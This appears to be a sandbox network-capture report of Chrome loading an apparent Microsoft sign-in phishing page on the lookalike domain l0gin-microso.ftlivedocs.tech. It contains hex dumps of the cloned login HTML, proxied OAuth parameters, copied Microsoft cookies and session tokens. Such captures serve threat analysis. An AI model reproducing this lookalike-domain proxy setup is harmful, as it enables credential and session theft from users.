                                                                                                                              Set-Cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFeJ70TfRsttiIrfUmnW-0z_T8-lF63IgUfCke1tc30Pvg4shhWe66YzXbRa7q79mvedkgjVeT96siaLz2yv7j3IBxQDFPCeFrMNQYEdZZWu77zm5CQyMJo4ixt36TPiKT8lqDcT0uYxeuK2_OOE09pCZpF8rIVp6iPzCQcJvFSZuQgAA; Path=/; Domain=l0gin-microso.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              2024-10-04 13:11:12 UTC789INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 65 73 63 74 78 2d 6b 76 6e 61 65 6d 69 71 53 73 73 3d 41 51 41 42 43 51 45 41 41 41 44 57 36 6a 6c 33 31 6d 42 33 54 37 75 67 72 57 54 54 38 70 46 65 33 73 56 49 34 44 69 4e 49 45 30 70 41 5f 30 46 61 59 74 72 34 37 5a 79 59 72 68 43 5a 35 31 41 38 64 56 53 64 43 34 39 43 33 59 34 6b 71 79 65 45 64 6f 51 39 61 67 78 44 79 54 54 78 49 48 6b 71 4a 44 4a 75 7a 7a 70 44 4c 4b 50 49 66 53 33 6c 5a 6f 70 46 51 53 5a 6c 63 44 70 73 67 55 47 31 7a 4c 75 2d 4c 31 37 70 78 57 43 59 50 53 37 6c 58 56 34 6f 39 6c 44 55 6b 42 63 6a 49 46 35 59 74 78 49 57 34 78 6f 32 77 63 49 52 56 57 56 31 48 62 51 57 53 41 41 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6c 30 67 69 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c 69 76 65 64 6f 63 73
                                                                                                                              Data Ascii: Set-Cookie: esctx-kvnaemiqSss=AQABCQEAAADW6jl31mB3T7ugrWTT8pFe3sVI4DiNIE0pA_0FaYtr47ZyYrhCZ51A8dVSdC49C3Y4kqyeEdoQ9agxDyTTxIHkqJDJuzzpDLKPIfS3lZopFQSZlcDpsgUG1zLu-L17pxWCYPS7lXV4o9lDUkBcjIF5YtxIW4xo2wcIRVWV1HbQWSAA; Path=/; Domain=l0gin-microso.ftlivedocs
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 34 30 30 30 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e
                                                                                                                              Data Ascii: 4000... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head> <title>Sign in to your account</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 25 32 66 6c 61 6e 64 69 6e 67 76 32 5c 75 30 30 32 36 72 65 73 70 6f 6e 73 65 5f 74 79 70 65 3d 63 6f 64 65 2b 69 64 5f 74 6f 6b 65 6e 5c 75 30 30 32 36 73 74 61 74 65 3d 4b 58 6f 75 4e 54 33 44 43 43 34 6e 4a 47 6d 5a 30
                                                                                                                              Data Ascii: ?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2fwww.ftlivedocs.tech%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2fwww.ftlivedocs.tech%2flandingv2\u0026response_type=code+id_token\u0026state=KXouNT3DCC4nJGmZ0
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 22 2c 22 73 68 6f 77 43 61 6e 74 41 63 63 65 73 73 41 63 63 6f 75 6e 74 4c 69 6e 6b 22 3a 74 72 75 65 2c 22 75 72 6c 47 69 74 48 75 62 46 65 64 22 3a 22 68 74 74 70 73 3a 2f 2f 79 77 6e 6a 62 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 5c 75 30 30 32 36 73 63 6f 70 65 3d 6f 70 65 6e 69 64 2b 70 72 6f 66 69 6c 65 2b 68 74 74 70 73 25 33 61 25 32 66 25 32 66 77 77 77 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 25 32 66 76 32 25 32 66 4f 66 66 69 63 65 48 6f 6d 65 2e 41 6c 6c 5c 75 30 30 32 36 72 65 64
                                                                                                                              Data Ascii: ftlivedocs.tech","showCantAccessAccountLink":true,"urlGitHubFed":"https://ywnjb.ftlivedocs.tech/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2fwww.ftlivedocs.tech%2fv2%2fOfficeHome.All\u0026red
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 72 75 65 2c 22 69 53 68 6f 77 52 65 73 65 6e 64 43 6f 64 65 44 65 6c 61 79 22 3a 39 30 30 30 30 2c 22 73 53 4d 53 43 74 72 79 50 68 6f 6e 65 44 61 74 61 22 3a 22 41 46 7e 41 66 67 68 61 6e 69 73 74 61 6e 7e 39 33 21 21 21 41 58 7e c3 85 6c 61 6e 64 20 49 73 6c 61 6e 64 73 7e 33 35 38 21 21 21 41 4c 7e 41 6c 62 61 6e 69 61 7e 33 35 35 21 21 21 44 5a 7e 41 6c 67 65 72 69 61 7e 32 31 33 21 21 21 41 53 7e 41 6d 65 72 69 63 61 6e 20 53 61 6d 6f 61 7e 31 21 21 21 41 44 7e 41 6e 64 6f 72 72 61 7e 33 37 36 21 21 21 41 4f 7e 41 6e 67 6f 6c 61 7e 32 34 34 21 21 21 41 49 7e 41 6e 67 75 69 6c 6c 61 7e 31 21 21 21 41 47 7e 41 6e 74 69 67 75 61 20 61 6e 64 20 42 61 72 62 75 64 61 7e 31 21 21 21 41 52 7e 41 72 67 65 6e 74 69 6e 61 7e 35 34 21 21 21 41 4d 7e 41 72 6d 65
                                                                                                                              Data Ascii: rue,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Arme
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 7e 45 72 69 74 72 65 61 7e 32 39 31 21 21 21 45 45 7e 45 73 74 6f 6e 69 61 7e 33 37 32 21 21 21 45 54 7e 45 74 68 69 6f 70 69 61 7e 32 35 31 21 21 21 46 4b 7e 46 61 6c 6b 6c 61 6e 64 20 49 73 6c 61 6e 64 73 7e 35 30 30 21 21 21 46 4f 7e 46 61 72 6f 65 20 49 73 6c 61 6e 64 73 7e 32 39 38 21 21 21 46 4a 7e 46 69 6a 69 7e 36 37 39 21 21 21 46 49 7e 46 69 6e 6c 61 6e 64 7e 33 35 38 21 21 21 46 52 7e 46 72 61 6e 63 65 7e 33 33 21 21 21 47 46 7e 46 72 65 6e 63 68 20 47 75 69 61 6e 61 7e 35 39 34 21 21 21 50 46 7e 46 72 65 6e 63 68 20 50 6f 6c 79 6e 65 73 69 61 7e 36 38 39 21 21 21 47 41 7e 47 61 62 6f 6e 7e 32 34 31 21 21 21 47 4d 7e 47 61 6d 62 69 61 7e 32 32 30 21 21 21 47 45 7e 47 65 6f 72 67 69 61 7e 39 39 35 21 21 21 44 45 7e 47 65 72 6d 61 6e 79 7e 34 39
                                                                                                                              Data Ascii: ~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 69 71 75 65 7e 32 35 38 21 21 21 4d 4d 7e 4d 79 61 6e 6d 61 72 7e 39 35 21 21 21 4e 41 7e 4e 61 6d 69 62 69 61 7e 32 36 34 21 21 21 4e 52 7e 4e 61 75 72 75 7e 36 37 34 21 21 21 4e 50 7e 4e 65 70 61 6c 7e 39 37 37 21 21 21 4e 4c 7e 4e 65 74 68 65 72 6c 61 6e 64 73 7e 33 31 21 21 21 4e 43 7e 4e 65 77 20 43 61 6c 65 64 6f 6e 69 61 7e 36 38 37 21 21 21 4e 5a 7e 4e 65 77 20 5a 65 61 6c 61 6e 64 7e 36 34 21 21 21 4e 49 7e 4e 69 63 61 72 61 67 75 61 7e 35 30 35 21 21 21 4e 45 7e 4e 69 67 65 72 7e 32 32 37 21 21 21 4e 47 7e 4e 69 67 65 72 69 61 7e 32 33 34 21 21 21 4e 55 7e 4e 69 75 65 7e 36 38 33 21 21 21 4e 46 7e 4e 6f 72 66 6f 6c 6b 20 49 73 6c 61 6e 64 7e 36 37 32 21 21 21 4b 50 7e 4e 6f 72 74 68 20 4b 6f 72 65 61 7e 38 35 30 21 21 21 4d 4b 7e 4e 6f 72 74 68
                                                                                                                              Data Ascii: ique~258!!!MM~Myanmar~95!!!NA~Namibia~264!!!NR~Nauru~674!!!NP~Nepal~977!!!NL~Netherlands~31!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!NF~Norfolk Island~672!!!KP~North Korea~850!!!MK~North
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 35 21 21 21 54 48 7e 54 68 61 69 6c 61 6e 64 7e 36 36 21 21 21 54 4c 7e 54 69 6d 6f 72 2d 4c 65 73 74 65 7e 36 37 30 21 21 21 54 47 7e 54 6f 67 6f 7e 32 32 38 21 21 21 54 4b 7e 54 6f 6b 65 6c 61 75 7e 36 39 30 21 21 21 54 4f 7e 54 6f 6e 67 61 7e 36 37 36 21 21 21 54 54 7e 54 72 69 6e 69 64 61 64 20 61 6e 64 20 54 6f 62 61 67 6f 7e 31 21 21 21 54 41 7e 54 72 69 73 74 61 6e 20 64 61 20 43 75 6e 68 61 7e 32 39 30 21 21 21 54 4e 7e 54 75 6e 69 73 69 61 7e 32 31 36 21 21 21 54 52 7e 54 75 72 6b 65 79 7e 39 30 21 21 21 54 4d 7e 54 75 72 6b 6d 65 6e 69 73 74 61 6e 7e 39 39 33 21 21 21 54 43 7e 54 75 72 6b 73 20 61 6e 64 20 43 61 69 63 6f 73 20 49 73 6c 61 6e 64 73 7e 31 21 21 21 54 56 7e 54 75 76 61 6c 75 7e 36 38 38 21 21 21 56 49 7e 55 2e 53 2e 20 56 69 72 67
                                                                                                                              Data Ascii: 5!!!TH~Thailand~66!!!TL~Timor-Leste~670!!!TG~Togo~228!!!TK~Tokelau~690!!!TO~Tonga~676!!!TT~Trinidad and Tobago~1!!!TA~Tristan da Cunha~290!!!TN~Tunisia~216!!!TR~Turkey~90!!!TM~Turkmenistan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!VI~U.S. Virg
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 73 2e 74 65 63 68 2f 63 6f 6d 6d 6f 6e 2f 44 65 76 69 63 65 43 6f 64 65 53 74 61 74 75 73 22 2c 22 75 72 6c 52 65 73 65 74 50 61 73 73 77 6f 72 64 22 3a 22 68 74 74 70 73 3a 2f 2f 70 61 73 73 77 6f 72 64 72 65 73 65 74 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 3f 72 75 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 6c 30 67 69 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 25 32 66 63 6f 6d 6d 6f 6e 25 32 66 72 65 70 72 6f 63 65 73 73 25 33 66 63 74 78 25 33 64 72 51 51 49 41 52 41 41 68 5a 49 5f 6a 4e 74 30 48 4d 58 74 35 43 35 33 46 77 47 4e 43 6b 4b 46 68 52 73 59 45 4a 44 6b 35 7a 2d 78 6b 30 69 48 53 47 4b 66 37 53 54 2d 6b 38 51 35 78 31 36 69 78 48 5a 69 2d 5f 7a 76 62 4d 64 4f 4c 44 45 77 49 44 45 67
                                                                                                                              Data Ascii: s.tech/common/DeviceCodeStatus","urlResetPassword":"https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2fl0gin-microso.ftlivedocs.tech%2fcommon%2freprocess%3fctx%3drQQIARAAhZI_jNt0HMXt5C53FwGNCkKFhRsYEJDk5z-xk0iHSGKf7ST-k8Q5x16ixHZi-_zvbMdOLDEwIDEg
                                                                                                                              2024-10-04 13:11:12 UTC1369INData Raw: 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 25 32 66 63 6f 6d 6d 6f 6e 25 32 66 72 65 70 72 6f 63 65 73 73 25 33 66 63 74 78 25 33 64 72 51 51 49 41 52 41 41 68 5a 49 5f 6a 4e 74 30 48 4d 58 74 35 43 35 33 46 77 47 4e 43 6b 4b 46 68 52 73 59 45 4a 44 6b 35 7a 2d 78 6b 30 69 48 53 47 4b 66 37 53 54 2d 6b 38 51 35 78 31 36 69 78 48 5a 69 2d 5f 7a 76 62 4d 64 4f 4c 44 45 77 49 44 45 67 64 42 4e 44 68 51 52 69 51 6a 63 68 4a 75 68 51 49 62 48 64 31 42 46 31 6f 58 4f 48 43 69 45 68 64 53 53 30 63 38 58 79 39 4a 37 65 30 33 66 35 66 73 70 48 5a 4b 31 52 51 32 72 67 77 79 4a 61 41 2d 33 33 63 5a 4a 6f 34 48 68 6a 57 63 56 51 6e 61 6a 69 72 53 57 6f 4e 6a 47 54 71 43 4a 47 43 39 74 58 4b 45 6e 6f 69 2d 68 75 75 64 4c 38 34 6e 76 79
                                                                                                                              Data Ascii: n-microso.ftlivedocs.tech%2fcommon%2freprocess%3fctx%3drQQIARAAhZI_jNt0HMXt5C53FwGNCkKFhRsYEJDk5z-xk0iHSGKf7ST-k8Q5x16ixHZi-_zvbMdOLDEwIDEgdBNDhQRiQjchJuhQIbHd1BF1oXOHCiEhdSS0c8Xy9J7e03f5fspHZK1RQ2rgwyJaA-33cZJo4HhjWcVQnajirSWoNjGTqCJGC9tXKEnoi-huudL84nvy


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.2.174981113.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:12 UTC408OUTGET /shared/1.0/content/js/BssoInterrupt_Core_JQnUxWSvwsd9FrpspQmznw2.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:12 UTC791INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:12 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 49804
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Mon, 05 Aug 2024 15:32:28 GMT
                                                                                                                              ETag: 0x8DCB563D09FF90F
                                                                                                                              x-ms-request-id: e10fc963-b01e-001c-0ed7-109136000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131112Z-15767c5fc55rg5b7sh1vuv8t7n0000000cug00000000hcqt
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:12 UTC15593INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a e8 6e 66 80 30 04 66 66 17 58 2e 27 56 c0 dd c1 ce da 0e 34 13 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 c1 45 ef fc a2 d2 ff 58 b9 f8 7c 74 7e 50 39 83 b7 7f 54 4e fb 17 47 fb 87 3f 5e 0f 7e 14 ff bf b8 f7 e3 ca d8 9f 88 0a fc 0e dd 58 78 95 30 a8 84 51 c5 0f 46 61 34 0d 23 37 11 71 e5 01 fe 46 be 3b a9 8c a3 f0 a1 92 dc 8b ca 34 0a bf 88 51 12 57 26 7e 9c 40 a1 a1 98 84 4f 95 2a 54 17 79 95 33 37 4a 9e 2b 47 67 66 1d ea 17 50 9b 7f e7 07 50 7a 14 4e 9f e1 f9 3e a9 04 61 e2 8f 44 c5 0d 3c aa 6d 02 2f 41 2c 2a b3 c0 13 51 e5 e9 de 1f dd 57 4e fc 51 14 c6 e1 38 a9 44 62 24
                                                                                                                              Data Ascii: m[80OL;wnf0ffX.'V4r~=,JUT~l?EX|t~P9TNG?^~Xx0QFa4#7qF;4QW&~@O*Ty37J+GgfPPzN>aD<m/A,*QWNQ8Db$
                                                                                                                              2024-10-04 13:11:12 UTC16384INData Raw: 27 1c c8 cc 3b 47 70 68 d3 97 de 38 51 da 2b 6d ae c3 c3 92 66 30 2c c7 e2 0e a7 d6 2d 0d 94 23 88 9f 19 2d 1f 22 de b2 95 e2 e1 43 fe ba 22 db f8 db c7 de c7 bd 8f bb 46 5e a9 e2 79 8b bb 39 80 f2 13 69 1c da 46 ac bd 01 17 40 95 be ca 7a c8 5e 78 9e 4e f0 34 2a 49 07 20 d2 55 18 4e aa f9 a9 79 19 46 01 fd be 74 21 2c 48 25 ed 0b d8 5c e1 21 97 5b fb 1f fa e7 08 c5 f1 db 24 52 d4 24 94 ea 86 a0 ac 71 9b a5 70 df 6e 64 32 7d bb 49 7e 1c 3a 35 86 3a 0b bc 11 b9 bc 63 53 13 db b6 21 b2 17 b6 8c 6c 3a de c8 b0 48 30 1a 78 e1 93 b1 f2 84 d9 a0 da 32 3b 49 9d 0e a3 ba 0c c0 20 f1 60 44 0e bf e1 b1 1f 00 db 07 eb f8 0b 93 7a ee 80 51 71 65 d0 f1 46 c6 4d b5 e4 80 4a d1 c1 db 33 01 93 60 94 84 63 3e bb 8d 4e f6 d7 4e 72 4b bf 55 91 07 da 56 22 f5 25 bb 62 d4 f0
                                                                                                                              Data Ascii: ';Gph8Q+mf0,-#-"C"F^y9iF@z^xN4*I UNyFt!,H%\![$R$qpnd2}I~:5:cS!l:H0x2;I `DzQqeFMJ3`c>NNrKUV"%b
                                                                                                                              2024-10-04 13:11:12 UTC16384INData Raw: 4f f2 d1 5f e3 49 57 25 53 20 30 da 2c 5f 9e fb be 25 d9 53 ac e2 06 6d fc 67 4d 28 10 b5 f0 53 88 c0 7e 3e c3 5e b0 96 88 a4 6a 56 81 ac 3c e2 4c 74 3e 79 ed bb 38 fd f9 09 7e 74 9f 32 42 c7 41 04 97 ac e7 a6 59 52 fe 59 8b 9a b4 f3 4a 8b b4 d6 10 bd d9 0f af 84 78 1b c9 34 c0 e1 99 a8 cd 23 a0 ce 8d b4 0e 00 99 43 46 38 aa 5e e1 a4 f2 b1 1e 2b 7f d5 16 32 3e 8d f2 99 ec b5 f7 ea 3d de 6a 55 6b ab 45 a6 da 10 6c 86 da dd 41 0a 35 3a 57 9c 6d af f8 17 dd 86 fe 9a 8f 67 27 ed 3a 5b 96 b7 fe 68 25 95 d8 2b b0 d4 b5 c8 c6 c9 ae 2d 62 2a 76 b4 6a a4 5b 48 7c 83 75 29 d5 f1 80 c1 6d 15 f3 46 e2 9d 67 bd 75 10 d5 0f fa 52 85 d6 65 ac 67 bd 66 c1 72 a4 33 6d ea 5c 99 93 86 6e a9 fd 34 e0 24 b4 0d 56 b1 61 56 94 05 d2 f1 9b 06 fa d6 bf 56 69 91 4c 38 d2 41 5f b8
                                                                                                                              Data Ascii: O_IW%S 0,_%SmgM(S~>^jV<Lt>y8~t2BAYRYJx4#CF8^+2>=jUkElA5:Wmg':[h%+-b*vj[H|u)mFguRegfr3m\n4$VaVViL8A_
                                                                                                                              2024-10-04 13:11:12 UTC1443INData Raw: 0e d0 f4 68 6c d8 37 44 70 d3 c6 9c 6a 8d 33 2e 82 62 3b 12 9c f1 56 32 89 89 b7 1c f8 4d 92 80 1d 13 a3 81 6b 0f 74 b0 f6 84 70 e9 e9 2c 49 af 92 78 a0 74 57 ec ad 25 df 18 38 c3 d4 53 29 e6 ae 8e 8b 93 b1 d2 56 e2 b7 bf 85 b6 94 6e 6e da cf 4a 54 d6 75 6d ac a3 fc 6d 23 e6 09 04 32 6d 06 4d 28 cf 16 35 28 24 8a d7 e3 11 0c 87 53 1f 83 11 24 c4 fc c3 89 41 42 39 c4 98 16 56 9e 4f 6d b3 c6 ef 84 26 af d9 dd a3 84 63 8c fa 7b eb 2a bd af dc 00 b7 88 03 05 8e ec fa fd 82 bd 9f 8c 0b 40 5f cc ab 16 c9 2c 13 c1 24 45 9b f2 c5 95 32 0f ac 16 0c f7 e9 05 a9 ed 10 12 2b 87 10 71 c9 25 6e 4c d0 b4 d8 26 e3 b3 13 af d7 74 bb 7d 5f d3 95 83 db 5b 37 ea 39 ca bb f7 00 bc c7 7d 71 70 80 36 07 87 17 11 46 47 79 ad 8b 01 fd 00 09 4b 55 8e 3a 38 8f 1e 84 6f dd b5 0c 51
                                                                                                                              Data Ascii: hl7Dpj3.b;V2Mktp,IxtW%8S)VnnJTumm#2mM(5($S$AB9VOm&c{*@_,$E2+q%nL&t}_[79}qp6FGyKU:8oQ


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              43192.168.2.1749821172.67.71.1244432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:12 UTC1273OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                              Host: ywnjb.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Purpose: prefetch
                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; MUID=0572C4040C3160E33E86D10A0D3661F9
                                                                                                                              2024-10-04 13:11:13 UTC1103INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:13 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=315360000
                                                                                                                              Expires: Mon, 02 Oct 2034 13:11:13 GMT
                                                                                                                              P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Ppserver: PPV: 30 H: PH1PEPF0001B72B V: 0
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Set-Cookie: uaid=12fc96651938487da1bcb76e2727bac5; Path=/; Domain=ywnjb.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: MSPRequ=id=N&lt=1728047473&co=1; Path=/; Domain=ywnjb.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Ms-Request-Id: 74a75dc8-c26b-4bc5-9e48-8e253702bced
                                                                                                                              X-Ms-Route-Info: C506_BAY
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HgZNyJZPVtxDrr9lsdrKmhlw8Aa%2BbbvdS6iBBlYfIQXaRmaP1aJZ07myO%2BrWJfNrl34UlnAfiPAna8IshF2NWMMHlURST8pPh7AawSk5KbOrjf92nHaWsOWNNfaVRKc6QhtZ2FvR3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56aa2a97c7cab-EWR
